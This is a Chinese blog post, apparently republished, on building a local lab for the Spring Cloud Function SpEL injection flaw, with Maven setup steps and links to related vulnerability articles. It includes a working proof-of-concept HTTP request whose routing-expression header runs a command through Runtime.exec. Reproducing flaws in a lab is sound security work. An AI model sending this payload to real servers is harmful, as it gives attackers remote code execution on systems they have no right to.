Spring-Cloud-Function-Spel|Spring-Cloud-Function-Spel 漏洞环境搭建
1、漏洞环境搭建
由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。
找了许久,终于在唐大佬的github中找到几乎一键的方法。
参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel 这里放原始链接以表示尊重。
无法上github的话,私信我。
搭建方法很简单,先安装maven jdk 等。大佬是jdk17 我本地下载最新版本18 也是ok
文章图片
方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run 会下载很多库,需要耐心等待。成功后会开启8080 端口。
文章图片
漏洞poc极其简单:
路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。
POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
文章图片
漏洞验证:
文章图片
【Spring-Cloud-Function-Spel|Spring-Cloud-Function-Spel 漏洞环境搭建】到此这篇关于Spring-Cloud-Function-Spel 漏洞复现的文章就介绍到这了,更多相关Spring-Cloud-Function-Spel 漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
推荐阅读
- java|Spring框架漏洞总结
- spring|Spring Boot Actuator 漏洞复现合集
- spring|【网络安全】Spring框架漏洞总结(一)
- Spring学习|Spring boot项目Fortify漏洞扫描问题解决
- 框架漏洞|Spring MVC漏洞合集
- 安全|【组件攻击链】一文看懂Spring全家桶各类RCE漏洞
- spring|Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
- java|Spring框架JDN注入漏洞信息及排查方法
- 网关|突发!Spring Cloud 爆高危漏洞。。赶紧修复!!
- 网传的Spring大漏洞